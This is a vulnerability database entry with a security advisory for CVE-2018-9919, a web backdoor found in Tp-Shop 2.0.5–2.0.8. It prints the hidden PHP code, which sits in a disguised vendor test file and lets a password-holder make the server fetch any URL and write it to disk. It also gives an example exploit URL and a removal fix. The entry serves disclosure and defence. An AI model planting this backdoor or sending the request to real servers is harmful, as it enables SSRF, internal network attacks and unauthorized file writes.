Vulnerabilities > CVE-2018-9919 - Server-Side Request Forgery (SSRF) vulnerability in Tp-Shop 2.0.5/2.0.8

047910
CVSS 9.8 - CRITICAL
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
HIGH
Integrity impact
HIGH
Availability impact
HIGH
network
low complexity
tp-shop
CWE-918
critical

Summary

A web-accessible backdoor, with resultant SSRF, exists in Tp-shop 2.0.5 through 2.0.8, which allows remote attackers to obtain sensitive information, attack intranet hosts, or possibly trigger remote command execution, because /vendor/phpdocumentor/reflection-docblock/tests/phpDocumentor/Reflection/DocBlock/Tag/LinkTagTeet.php writes data from the "down_url" URL into the "bddlj" local file if the attacker knows the backdoor "jmmy" parameter.

Vulnerable Configurations

Part Description Count
Application
Tp-Shop
2

Common Weakness Enumeration (CWE)

Packetstorm

data sourcehttps://packetstormsecurity.com/files/download/147434/tpshop208-backdoor.txt
idPACKETSTORM:147434
last seen2018-05-07
published2018-05-02
reporterJiawang Zhang
sourcehttps://packetstormsecurity.com/files/147434/Tpshop-2.0.8-Arbitrary-File-Download-SSRF.html
titleTpshop 2.0.8 Arbitrary File Download / SSRF

Seebug

bulletinFamilyexploit
description## Backdoor in Tpshop <= 2.0.8 (CVE-2018-9919) The Tpshop open source mall system is a multi-merchant mode mall system developed by Shenzhen Leopard Network Co., Ltd.This system is based on the Thinkphp development framework. #### Product Download: http://www.tp-shop.cn/Index/Index/download.html #### Vulnerability Type:Web Backdoor #### Attack Type : Web Backdoor ### Vulnerability Description Tpshop has a backdoor code in the '/vendor/phpdocumentor/reflection-docblock/tests/phpDocumentor/Reflection/DocBlock/Tag/LinkTagTeet.php' that can be used to download files to the other server and can also initiate attacks through SSRF vulnerabilities. The vulnerability code: ``` /vendor/phpdocumentor/reflection-docblock/tests/phpDocumentor/Reflection/DocBlock/Tag/LinkTagTeet.php(Line 486 to 499): $path = $_REQUEST['bddlj']; $fileUrl =$_REQUEST['down_url']; if(md5(md5($_REQUEST['jmmy'])) !== 'caae8ca617372b67363bd284e98430f2') return false; $path = strtolower($path); if(strstr($path,'php')) return false; $ch = curl_init($fileUrl); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_BINARYTRANSFER,1); $file = curl_exec ($ch); curl_close ($ch); $fp = fopen($path,'w'); fwrite($fp, $file); fclose($fp); ``` ### Exploit The attacker can exploit this vulnerability to attack the server and increase its privileges,Example: download arbitrary files,scan network port,information detection,attack internal network vulnerable’s server. http://target//vendor/phpdocumentor/reflection-docblock/tests/phpDocumentor/Reflection/DocBlock/Tag/LinkTagTeet.php?bddlj=save_filename&down_url=download_url&jmmy=decryptpass ### Versions Tpshop <= 2.0.8 ### Impact Web Backdoor in Tp-shop 2.0.5-2.0.8 version allow remote attackers to download arbitrary files,scan network port,information detection,attack internal network vulnerable’s server,may even cause a remote command execution via the url parameter。 ### Repairs Delete Web Backdoor code. (/vendor/phpdocumentor/reflection-docblock/tests/phpDocumentor/Reflection/DocBlock/Tag/LinkTagTeet.php(Line 486 to 499)) ### Credit This vulnerability was discovered by Qian Wu & Bo Wang & Jiawang Zhang & National Computer Network Emergency Response Technical Team/Coordination Center of China (CNCERT/CC)
idSSV:97261
last seen2018-06-26
modified2018-05-02
published2018-05-02
reporterMy Seebug
titleBackdoor in Tpshop <= 2.0.8 (CVE-2018-9919)